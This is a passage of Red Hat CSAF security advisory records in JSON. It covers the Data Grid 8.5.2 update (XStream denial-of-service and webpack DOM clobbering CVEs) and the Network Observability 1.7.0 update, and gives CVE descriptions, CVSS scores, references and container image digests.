"text": "Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.\n \nData Grid 8.5.2 replaces Data Grid 8.5.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.5.2 in the Release Notes[3].\n\nSecurity Fix(es):\n\n* CVE-2024-47072 com.thoughtworks.xstream/xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream [jdg-8] (CVE-2024-47072)\n\n* CVE-2024-43788 webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule [jdg-8] (CVE-2024-43788)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:10214",
"url": "https://access.redhat.com/errata/RHSA-2024:10214"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.5/html-single/red_hat_data_grid_8.5_release_notes/index",
"url": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.5/html-single/red_hat_data_grid_8.5_release_notes/index"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2324606",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2324606"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10214.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Data Grid 8.5.2 security update",
"tracking": {
"current_release_date": "2024-12-17T18:59:59+00:00",
"generator": {
"date": "2024-12-17T18:59:59+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2024:10214",
"initial_release_date": "2024-11-25T16:56:04+00:00",
"revision_history": [
{
"date": "2024-11-25T16:56:04+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-11-25T16:56:04+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-17T18:59:59+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Data Grid",
"product": {
"name": "Red Hat Data Grid",
"product_id": "Red Hat Data Grid",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:jboss_data_grid:8"
}
}
}
],
"category": "product_family",
"name": "Red Hat JBoss Data Grid"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Data Grid"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-11-25T16:56:04+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Data Grid"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10214"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Data Grid"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat Data Grid"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-47072",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2024-11-08T13:47:39.374198+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2324606"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the XStream library. A remote attacker may trigger a denial of service by manipulating the processed input stream when XStream is configured to use the BinaryStreamDriver. This issue may lead to the termination of the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "com.thoughtworks.xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in XStream is considered an Important severity rather than Moderate because it exposes applications to a denial of service (DoS) attack with relative ease. By exploiting the flaw in the `BinaryStreamDriver`, an attacker can manipulate the binary input stream to trigger a stack overflow, which terminates the application unexpectedly. Unlike moderate vulnerabilities, which may require specific conditions or limited privileges, this flaw enables remote attackers to forcefully terminate services by crafting malicious input, impacting system availability. Additionally, the vulnerability\u2019s reliance on a common serialization mechanism elevates the risk, as it may affect applications across various environments and industries where XStream is deployed.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Data Grid"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-47072"
},
{
"category": "external",
"summary": "RHBZ#2324606",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2324606"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-47072",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47072"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-47072",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47072"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266",
"url": "https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-hfq9-hggm-c56q",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-hfq9-hggm-c56q"
},
{
"category": "external",
"summary": "https://x-stream.github.io/CVE-2024-47072.html",
"url": "https://x-stream.github.io/CVE-2024-47072.html"
}
],
"release_date": "2024-11-07T23:38:52.978000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-11-25T16:56:04+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Data Grid"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10214"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Data Grid"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Data Grid"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "com.thoughtworks.xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream"
}
]
}
RHSA-2024:8014
Vulnerability from csaf_redhat - Published: 2024-10-22 01:05 - Updated: 2025-11-28 12:47Summary
Red Hat Security Advisory: Network Observability 1.7.0 for OpenShift
Notes
Topic
Network Observability 1.7 for Red Hat OpenShift
Red Hat Product Security has rated this update as having a security impact of
Important. A Common Vulnerability Scoring System (CVSS) base score, which gives
a detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Network Observability 1.7.0
Security Fix(es):
* Network Observability: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* Network Observability: XSS vulnerability via prototype pollution (CVE-2024-45801)
* Network Observability: axios: Server-Side Request Forgery (CVE-2024-39338)
* Network Observability: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* Network Observability: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* Network Observability: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* Network Observability: Improper Input Handling in Express Redirects (CVE-2024-43796)
* Network Observability: Improper Sanitization in serve-static (CVE-2024-43800)
* Network Observability: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)
* Network Observability: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)
* Network Observability: Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Network Observability 1.7 for Red Hat OpenShift\n\nRed Hat Product Security has rated this update as having a security impact of\nImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives\na detailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Network Observability 1.7.0\n\nSecurity Fix(es):\n\n* Network Observability: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* Network Observability: XSS vulnerability via prototype pollution (CVE-2024-45801)\n* Network Observability: axios: Server-Side Request Forgery (CVE-2024-39338)\n* Network Observability: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* Network Observability: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* Network Observability: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n* Network Observability: Improper Input Handling in Express Redirects (CVE-2024-43796)\n* Network Observability: Improper Sanitization in serve-static (CVE-2024-43800)\n* Network Observability: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)\n* Network Observability: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)\n* Network Observability: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:8014",
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2310527",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310527"
},
{
"category": "external",
"summary": "2310528",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310528"
},
{
"category": "external",
"summary": "2310529",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310529"
},
{
"category": "external",
"summary": "2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "2312631",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631"
},
{
"category": "external",
"summary": "NETOBSERV-1377",
"url": "https://issues.redhat.com/browse/NETOBSERV-1377"
},
{
"category": "external",
"summary": "NETOBSERV-1509",
"url": "https://issues.redhat.com/browse/NETOBSERV-1509"
},
{
"category": "external",
"summary": "NETOBSERV-1538",
"url": "https://issues.redhat.com/browse/NETOBSERV-1538"
},
{
"category": "external",
"summary": "NETOBSERV-1540",
"url": "https://issues.redhat.com/browse/NETOBSERV-1540"
},
{
"category": "external",
"summary": "NETOBSERV-1564",
"url": "https://issues.redhat.com/browse/NETOBSERV-1564"
},
{
"category": "external",
"summary": "NETOBSERV-163",
"url": "https://issues.redhat.com/browse/NETOBSERV-163"
},
{
"category": "external",
"summary": "NETOBSERV-1666",
"url": "https://issues.redhat.com/browse/NETOBSERV-1666"
},
{
"category": "external",
"summary": "NETOBSERV-1667",
"url": "https://issues.redhat.com/browse/NETOBSERV-1667"
},
{
"category": "external",
"summary": "NETOBSERV-1733",
"url": "https://issues.redhat.com/browse/NETOBSERV-1733"
},
{
"category": "external",
"summary": "NETOBSERV-1746",
"url": "https://issues.redhat.com/browse/NETOBSERV-1746"
},
{
"category": "external",
"summary": "NETOBSERV-1748",
"url": "https://issues.redhat.com/browse/NETOBSERV-1748"
},
{
"category": "external",
"summary": "NETOBSERV-1753",
"url": "https://issues.redhat.com/browse/NETOBSERV-1753"
},
{
"category": "external",
"summary": "NETOBSERV-1766",
"url": "https://issues.redhat.com/browse/NETOBSERV-1766"
},
{
"category": "external",
"summary": "NETOBSERV-1779",
"url": "https://issues.redhat.com/browse/NETOBSERV-1779"
},
{
"category": "external",
"summary": "NETOBSERV-1783",
"url": "https://issues.redhat.com/browse/NETOBSERV-1783"
},
{
"category": "external",
"summary": "NETOBSERV-1788",
"url": "https://issues.redhat.com/browse/NETOBSERV-1788"
},
{
"category": "external",
"summary": "NETOBSERV-1798",
"url": "https://issues.redhat.com/browse/NETOBSERV-1798"
},
{
"category": "external",
"summary": "NETOBSERV-1805",
"url": "https://issues.redhat.com/browse/NETOBSERV-1805"
},
{
"category": "external",
"summary": "NETOBSERV-1806",
"url": "https://issues.redhat.com/browse/NETOBSERV-1806"
},
{
"category": "external",
"summary": "NETOBSERV-1808",
"url": "https://issues.redhat.com/browse/NETOBSERV-1808"
},
{
"category": "external",
"summary": "NETOBSERV-1811",
"url": "https://issues.redhat.com/browse/NETOBSERV-1811"
},
{
"category": "external",
"summary": "NETOBSERV-1812",
"url": "https://issues.redhat.com/browse/NETOBSERV-1812"
},
{
"category": "external",
"summary": "NETOBSERV-1813",
"url": "https://issues.redhat.com/browse/NETOBSERV-1813"
},
{
"category": "external",
"summary": "NETOBSERV-1816",
"url": "https://issues.redhat.com/browse/NETOBSERV-1816"
},
{
"category": "external",
"summary": "NETOBSERV-1819",
"url": "https://issues.redhat.com/browse/NETOBSERV-1819"
},
{
"category": "external",
"summary": "NETOBSERV-1848",
"url": "https://issues.redhat.com/browse/NETOBSERV-1848"
},
{
"category": "external",
"summary": "NETOBSERV-1884",
"url": "https://issues.redhat.com/browse/NETOBSERV-1884"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8014.json"
}
],
"title": "Red Hat Security Advisory: Network Observability 1.7.0 for OpenShift",
"tracking": {
"current_release_date": "2025-11-28T12:47:15+00:00",
"generator": {
"date": "2025-11-28T12:47:15+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.13"
}
},
"id": "RHSA-2024:8014",
"initial_release_date": "2024-10-22T01:05:39+00:00",
"revision_history": [
{
"date": "2024-10-22T01:05:39+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-22T01:05:39+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-11-28T12:47:15+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "NETOBSERV 1.7 for RHEL 9",
"product": {
"name": "NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:network_observ_optr:1.7.0::el9"
}
}
}
],
"category": "product_family",
"name": "Network Observability"
},
{
"branches": [
{
"category": "product_version",
"name": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"product": {
"name": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"product_id": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"product": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"product_id": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"product": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"product_id": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"product": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"product_id": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"product": {
"name": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"product_id": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle\u0026tag=1.7.0-86"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"product": {
"name": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"product_id": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator\u0026tag=v1.7.0-67"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"product": {
"name": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"product_id": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"product": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"product_id": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"product": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"product_id": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"product": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"product_id": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"product": {
"name": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"product_id": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle\u0026tag=1.7.0-86"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le",
